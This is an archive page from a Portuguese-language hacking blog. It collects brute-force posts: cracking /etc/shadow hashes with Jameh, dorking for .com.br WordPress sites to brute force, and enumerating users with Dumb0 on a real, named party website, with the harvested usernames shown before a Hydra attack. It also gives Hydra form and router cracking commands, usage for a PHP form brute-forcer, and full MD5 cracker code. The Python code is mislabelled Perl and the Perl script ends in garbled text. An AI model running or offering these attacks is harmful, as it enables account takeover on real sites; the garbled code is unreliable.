Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador bruteforce. Mostrar todas as postagens
Mostrando postagens com marcador bruteforce. Mostrar todas as postagens

sexta-feira, 3 de julho de 2015

Jameh - Brute Force Hash passwords /etc/shadow

Jameh - Brute Force

Jameh, who actually writes and reads 'Jame' which is the Tupi Guarani means hidden, mysterious, aims to conduct a brute-force hashed passwords contained in the / etc / shadow, passing the salt and hash of the encrypted password he tries to break through the dictionary password. Jameh was inspired by the tool made by Ricardo Longatto done in C loncrack  to perform a brute-force passwords in hash staying in the / etc / shadow.

Jameh, who actually writes and reads 'Jame' which is the Tupi Guarani means hidden, mysterious, aims to conduct a brute-force hashed passwords contained in the /etc /shadow, passing the salt and hash of the encrypted password he tries to break through the dictionary password.

Creator
Danilo Vaz - UNK
[email protected]
http://unk-br.blogspot.com
https://twitter.com/unknownantisec
http://github.com/danilovazb

Jameh was inspired by the tool made by Ricardo Longatto done in C loncrack  to perform a brute-force passwords in hash staying in the /etc/shadow.

REQUERIMENTS

Import:
threading
time
crypt
argparse
sys
subprocess

permission       Reading & Writing
User                root privilege, or is in the sudoers group
Operating system    LINUX
Python              2.7


INSTALL
git clone http://github.com/danilovazb/jameh

HELP
usage:
jameh.py [-h] [-t 10] -f word_list.txt -s '$6$DgAOLzvU' -ha         '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'

optional arguments:
  -h, --help        show this help message and exit
  -t 10, --threads 10
                    Threads
  -f word_list.txt, --file word_list.txt
                    Opens file with passwords
  -s '$6$DgAOLzvU', --salt '$6$DgAOLzvU'
                    Salt, '$6$DgAOLzvU'
  -ha '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.', --hash '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'
                    hash, '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii
                    6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'

EXAMPLE:
Password: [email protected]#

~# cat /etc/shadow
root:!:16440:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
danilo:$6$DgAOLzvU$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.:16440:0:99999:7:::

COMMAND:
~# python jameh.py --file wl.txt --threads 10 --salt '$6$DgAOLzvU' --hash '$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.'


Ref:

terça-feira, 31 de março de 2015

Inurlbr dorking + Wordpress brute forcing

[ Inurlbr dorking + Wordpress brute forcing ]

[ Inurlbr dorking + Wordpress brute forcing ]

    Eae galera, esses dias eu estava pesquisando algumas falhas em wordpress, então tive uma ideia de montar um script que realiza-se um bruteforce em wordpress's, Só que antes ele cata-se os sites com cms (Wordpress) e salva-se em um .txt.

    Pensei em fazer essa etapa de dorking na mão, mas pra quer ter esse trabalho todo quando se pode se utilizar o nosso scaner Inurlbr <3 com as dorks já definidas. Depois de catar as url na etapa de dorking com Inurlbr, Montei o script que verifica se aquela url trabalha ou não com Wordpress, caso não trabalhar ele te print na tela "Not is wordpress" caso contrario ele realizará o bruteforce com senhas padrões contidas dentro do código. No script tem poucas senhas mas você pode incrementar mas senhas ou se você tiver um pequeno conhecimento em python você pode colocar o script para carregar um wordlist.txt.

   A etapa de dorking você pode escolher em fazer manualmente ou deixar o script fazer por você, na execução ele ira te perguntar; Dorking use to find sites using the inurlbr? [Y][N].



[ COMMAND SCANNER INURLBR ]

  • ./inurlbr.php -q 1,6 --dork "[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"
  • Você pode adicionar mas dorks no comando do scanner, seperando elas com "[DORK]"

  [DEMO]






segunda-feira, 23 de junho de 2014

[Dumb0] extração de usuários + HYDRA força bruta em formularios web


 [Dumb0] + HYDRA

 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

baixar: git clone https://github.com/0verl0ad/Dumb0.git
projeto: https://github.com/0verl0ad/Dumb0/


CMS que podemos extrair:
            SMF        --         Simple Machine Forums
            IPB          --        Invision Power Board
            XEN        --        Xen Foro
            VB          --        vBulletin
            myBB     --
            useBB    --
            vanilla  --
            bbPress  --
            WP     --        WordPress
            SPIP     --        SPIP CMS
            DRUPAL   --        Drupal
            MOODLE      --        Moodle
            BEE     --        Beehive Forums
            FLUX     --        fluxBB
            FUD     --        FUDforum
            punBB     --
            ACM     --        AcmImBoard XD
            BURN     --        Burning Board
            COM     --        Community Servers
            deluxeBB --       
            fusionBB --
            JFORUM     --
            JITBIT      --        Jibit ASPNetForum
            JIVE     --        Jive Forums
            NEAR     --        Near Forums
            OVBB     --       
            TikiWiki --        TikiWiki CMS-Groupware
Usando:
 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

Comando
Dumb0 ex:
perl dumb0.pl --url=[SEU_ALVO URL] --type=[CMS/FORUM ID] {OPTIONS: --log=[SESSION COOKIE] --file[FILENAME] }


Uma vez identificado o CMS-usuarios podemos direcionar um ataque de força bruta contra eles via hydra.
Usando Hydra:

hydra URL http-form-post "/Path/archivo.php:ParametroUser=^USER^&parametroPass=^PASS^:MSG QUE INDICA FALHA" -L seus_user.txt -P senhas.txt

Sintaxe simples fica assim :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"

--------------------------------------------------------------------------------
 Para criar esta sintaxe foi preciso : Valor do atributo action do
 <form> : logar.php Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass Mensagem de erro ou parte dela: "Usuário ou senha invalida" - O uso do caractere coringa é permitido : .*senha invalida - É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"

--------------------------------------------------------------------------------


Exemplo de resultado Dumb0:
alvo:http://www.psdb-mg.org.br/

perl Dumb0.pl --type=WP --url='http://www.psdb-mg.org.br/' --file='ps.txt'

RESULTADO:

[!] Dumping users from http://www.psdb-mg.org.br/...

[+] Posible user found ~> admin &#8211; PSDB - MG
[+] Posible user found ~> psdb &#8211; PSDB - MG
[+] Posible user found ~> psdbjovem &#8211; PSDB - MG
[+] Posible user found ~> psdbmulher &#8211; PSDB - MG
[+] Posible user found ~> psdbsindical &#8211; PSDB - MG
[+] Posible user found ~> itv &#8211; PSDB - MG
[+] Posible user found ~> Alias &#8211; PSDB - MG
[+] Posible user found ~> tucanafro &#8211; PSDB - MG
[!] Work finished


Depois de terminado o scan de users, agora direcionar seu ataque de força bruta com Hydra.

REF:http://blog.0verl0ad.com/2014/02/dumb0pl-herramienta-para-extraer.html
REF:http://www.exploit-db.com/papers/18939/

quarta-feira, 25 de setembro de 2013

Script login PHP facebook.

Script login PHP facebook.

Script login PHP facebook.

 

Pode facilmente adaptado em um bruteforce web.
Usando...

http://localhost/loginFace.php?arquivo=arquivoCookie01.txt

SCRIPT: http://pastebin.com/yQUJDPE2

sexta-feira, 20 de setembro de 2013

Força bruta form 1.0 - Bruteforce em formularios web

Força bruta form 1.0  

Feito em PHP, Efetua teste de senha em formularios web.
Seja por validação de url logada ou erro de retorno.

Força bruta form 1.0


Em execução com acesso concedido, logo abaixo exemplo de comando utilizado.




  php bruteforms.php urlpost post senhas tipo validação proxy


 Ajuda: ./bruteforms.php ajuda


 Validação[1] por url.

 php bruteforms.php --urlpost='http://url/validarLogin.php' 'usuario=admin&senha=[SENHA]' --arquivo='senhas.txt' --tipo='1' --validar='http://url/admin/index.php'.

 Validação[2] por erro.

 php bruteforms.php --urlpost='http://url/validarLogin.php' 'usuario=admin&senha=[SENHA]' --arquivo='senhas.txt' --tipo='2' --validar='login erro'.


 Referente proxy basta o mesmo ser setado --proxy='exemplo:8080'.



Os campos do post são setados para validação.


 php bruteforms.php --urlpost='http://url/login_vai.php' 'login=admin&password=[SENHA]' --arquivo='senhas.txt' --tipo='1' --validar='http://url/admin/index.php'.

Dow: http://pastebin.com/zmhdUVyM

domingo, 15 de setembro de 2013

Quebrando Senha via HTTP com (Hydra)

Quebrando Senha via HTTP com (Hydra)

Criado por van Hauser para testes no Linux, THC-Hydra é um cracker de senhas de rede rapído e flexilvel. Utilizando um metódo capaz de quebrar senhas em segundos considerando seu processador e o tamanho da senha. THC-Hydra pode ser usado em modo de texto, mas há também uma interface grafica disponível. O THC-Hydra está disponível para Linux (tar ball), Windows via Cygwin e outros.

O que é isso?
Um guia básico de como usar hydra para quebrar a senha via http de um roteador doméstico

Como funciona?
Use um ataque de dicionário para testar falhas ou senhas simples uma a uma ou em clientes remotos.

O que é preciso?
- Hydra
- Dicionario Grande (wordlist)

Software
Nome: Hydra
Versão: 5.4
Site: #!/bin/the hacker's choice - THC
Download: The Hacker's Choice Download

Comandos:
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /

-l = login
-P = senha (veja na wordlist)
-e ns = verifica por senhas "vazias"
-t xx= Quanto tarefas são executadas por vez
-f = sair, caso uma vez encontre no 1 login/senha
-s = conectar via SSL
-vV = verbose mode (exibe mais informações)
192.168.1.1 = endereço IP
http-get = O que quebrar/método etc
/ = Pagina para quebra - root

Fonte: http://www.backtrack-linux.org/forums/showthread.php?t=27322
Vídeo: http://blip.tv/g0tmi1k/cracking-http-passwords-hydra-2337840

Referencia: http://www.thc.org/thc-hydra/

domingo, 7 de outubro de 2012

WPBforce é uma Ferramenta para cackear usuário de um site Wordpress, utilizando a técnica de Força Bruta.

WPBforce é uma Ferramenta para cackear usuário de um site Wordpress, utilizando a técnica de Força Bruta.

WPBforce utiliza tecnologia de MiltThreads ( Conexões Simultâneas ), Suporta a utilização de Proxy, Dando um pouco de privacidade para o atacante!


WPBforce é uma Ferramenta para cackear usuário de um site Wordpress, utilizando a técnica de Força Bruta.

WPBforce utiliza tecnologia de MiltThreads ( Conexões Simultâneas ), Suporta a utilização de Proxy, Dando um pouco de privacidade para o atacante!




Download

WPBforce -:http://sourceforge.net/projects/wpbforce/files/WPBforce.zip/download


Virus Scan
Scan Result Link: http://my-avscan.com/result.php?scan=NDQ1MTE4
Scan Date: 2012-05-01
Scan Occured: 58 seconds ago
File Name: WPBforce.exe
File Size: 996352 bytes
MD5 Hash: e784952326b19bbc67be40daad76a788
SHA1 Hash: a13a5eda9bb291b5374978e3c8e642000962b0b4
Status: Limpo
Total Result: 0/37

domingo, 14 de agosto de 2011

[Perl] MD5 Brute forcer

 [Perl] MD5 Brute forcer
#MD5 Cracker (GUI Version)
#d3hydr8[at]gmail[dot]com
#http://www.darkc0de.com

from Tkinter import *
import tkFileDialog, md5

class Application(Frame):
    def __init__(self, master):
        Frame.__init__(self, master)
        self.grid()
        self.create_widget()
    def create_widget(self):
       
        self.lbl = Label(self, text = "ENTER MD5: ")
        self.lbl.grid(row = 2, column = 0, sticky = E)
       
        self.pw_ent = Entry(self, width = 32)
        self.pw_ent.grid(row = 2, column = 1, sticky = E)
       
        self.submit_bttn = Button(self, text = "Choose Wordlist", command = self.loadwords)
        self.submit_bttn.grid(row = 5, column = 1, sticky = W)
       
        self.txtbox = Text(self, width = 55, height = 8, font=('Georgia', 8), bg = "#CCC", wrap = WORD)
        self.txtbox.grid(row = 7, column = 0, columnspan = 2, sticky = W)

        self.bttn1 = Button(self, text = "Crack", font=('courier', 10, 'bold'), command = self.crack)
        self.bttn1.grid(row = 9, columnspan = 2, sticky = "WE")
   
        self.clear = Button(self, text="Clear", font=('Georgia', 8), command = self.clear)
        self.clear.grid(row = 10, column = 1,sticky= E)
       
    def loadwords(self):
        global wordlist
        file = tkFileDialog.askopenfile(parent=root,mode='r',title='Choose a file')
        wordlist = file.readlines()
        self.txtbox.insert(END, "Loaded: "+str(len(wordlist))+" words")
       
    def crack(self):
        pw = self.pw_ent.get()
        if len(pw) == 32:
            self.txtbox.insert(END, "\nCracking: "+pw)
            for word in wordlist:
                hash = md5.new(word.replace("\n","")).hexdigest()
                if pw == hash:
                    self.txtbox.insert(END, "\n\nCracked: "+word)
                    break
            self.txtbox.insert(END, "\nComplete")
        else:
            self.txtbox.insert(END, "\nImproper MD5 Length: "+str(len(pw)))
           
    def clear(self):
        self.pw_ent.delete(0, END)
           self.txtbox.delete(0.0, END)
        wordlist = []
       
root = Tk()
root.title("MD5 Cracker")
root.geometry("350x200")
app = Application(root)
root.mainloop()

[Perl] MD5 Brute forcer

 [Perl] MD5 Brute forcer
 #!/usr/bin/perl

# use strict; Sorry next time i'll use it ;)
# MD5 Hash Bruteforce Kit
# by Iman Karim ([email protected])
# URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/
# Date : 11.02.2007
# Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords ;)
# Info[1] : Written under Kubuntu Linux (Throw away Windows!)
# Info[2] : If you can code a bit perl, you can modify it to crack sha etc too...
# Greets to: Invisible!

$ver = "01";

$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.



if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);

if ($ARGV[0]=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($ARGV[0]=~"d") {
$alpha = $alpha."1234567890";}

if ($ARGV[0]=~"x") {

$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}

if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};

print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";

for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
crack ($t);
}

sub usage{
print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n";
print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n";
print "USAGE\n";

print "./md5crack \n";
print " Charset can be: [aAdx]\n";
print " a = {'a','b','c',...}\n";
print " A = {'A','B','C',...}\n";
print " d = {'1','2','3',...}\n";
print " x = {'!','\"',' ',...}\n";
print "EXAMPLE FOR CRACKING A MD5 HASH\n";
print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with nearly every character.\n";
print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
die "Quitting...\n";

}

sub crack{
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;}

$Start = gettimeofday();
do{
  for (my $i =0;$i<$CharSet;$i++){
   if ($RawString[$i] > length($alpha)-1){
    if ($i==$CharSet-1){
    print "Bruteforcing done with $CharSet Chars. No Results.\n";
    $cnt=0;
    return false;
   }
   $RawString[$i+1]++;
   $RawString[$i]=0;
   }
  }

###################################################

   $ret = "";
   for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
   $hash = md5_hex($ret);
   $cnt++;
   $Stop = gettimeofday();
   if ($Stop-$Start>$dbgtmr){
    $cnt = int($cnt/$dbgtmr);
    print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
    $cnt=0;
    $Start = gettimeofday();
   }
            print "$ARGV[3] != $hash ($ret)\n";
   if ($ARGV[3] eq $hash){
    die "\n**** Password Cracked! => $ret\n";
   }

###################################################

  #checkhash($CharSet)."\n";

  $RawString[0]++;
}while($RawString[$CharSet-1]
$dbgtmr){="" (my="" .="" ;="" <="" checkhash{="" cracked!=">" eq="" for="" hashes\\second.\tlast="" if="" length($alpha));="" pass="" password="" sub="" substr($alpha,$rawstring[$i],1);}="" yourmd5="" }<="" }="">